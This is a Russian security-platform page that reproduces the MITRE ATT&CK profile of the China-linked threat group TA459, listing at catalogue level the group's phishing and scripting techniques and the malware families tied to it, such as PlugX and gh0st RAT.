Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

TA459

TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)
ID: G0062
Associated Groups: 
Version: 1.1
Created: 18 Apr 2018
Last Modified: 30 Mar 2020

Associated Group Descriptions

Name Description

Techniques Used

Domain ID Name Use
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

TA459 has used PowerShell for execution of a payload.(Citation: Proofpoint TA459 April 2017)

.005 Command and Scripting Interpreter: Visual Basic

TA459 has a VBScript for execution.(Citation: Proofpoint TA459 April 2017)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments.(Citation: Proofpoint TA459 April 2017)

Enterprise T1204 .002 User Execution: Malicious File

TA459 has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.(Citation: Proofpoint TA459 April 2017)

Software

ID Name References Techniques
S0230 ZeroT (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017) Deobfuscate/Decode Files or Information, Bypass User Account Control, Windows Service, Binary Padding, DLL Side-Loading, System Network Configuration Discovery, System Information Discovery, Steganography, Web Protocols, Software Packing, Ingress Tool Transfer, Symmetric Cryptography, Encrypted/Encoded File
S0013 PlugX (Citation: CIRCL PlugX March 2013) (Citation: Dell TG-3390) (Citation: DestroyRAT) (Citation: FireEye Clandestine Fox Part 2) (Citation: Kaba) (Citation: Korplug) (Citation: Lastline PlugX Analysis) (Citation: New DragonOK) (Citation: Novetta-Axiom) (Citation: Proofpoint TA459 April 2017) (Citation: Sogu) (Citation: Thoper) (Citation: TVT) Modify Registry, File and Directory Discovery, Masquerade Task or Service, Hidden Files and Directories, Multiband Communication, Non-Application Layer Protocol, Keylogging, Dead Drop Resolver, DLL Side-Loading, Process Discovery, Query Registry, DLL Search Order Hijacking, Network Share Discovery, MSBuild, Web Protocols, Windows Service, Windows Command Shell, Ingress Tool Transfer, System Checks, System Network Connections Discovery, Match Legitimate Name or Location, Registry Run Keys / Startup Folder, Custom Command and Control Protocol, DNS, Screen Capture, Commonly Used Port, Symmetric Cryptography, Deobfuscate/Decode Files or Information, Native API, Obfuscated Files or Information
S0032 gh0st RAT (Citation: Arbor Musical Chairs Feb 2018) (Citation: FireEye Hacking Team) (Citation: Moudoor) (Citation: Mydoor) (Citation: Nccgroup Gh0st April 2018) (Citation: Novetta-Axiom) (Citation: Proofpoint TA459 April 2017) Shared Modules, Modify Registry, Ingress Tool Transfer, Process Injection, Rundll32, Service Execution, DLL Side-Loading, Command and Scripting Interpreter, Query Registry, Deobfuscate/Decode Files or Information, Symmetric Cryptography, Non-Application Layer Protocol, Native API, Process Discovery, Windows Service, Registry Run Keys / Startup Folder, Clear Windows Event Logs, System Information Discovery, File Deletion, Screen Capture, Fast Flux DNS, Keylogging, Standard Encoding, Encrypted Channel
S0033 NetTraveler (Citation: Kaspersky NetTraveler) (Citation: Proofpoint TA459 April 2017) Application Window Discovery, Keylogging

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.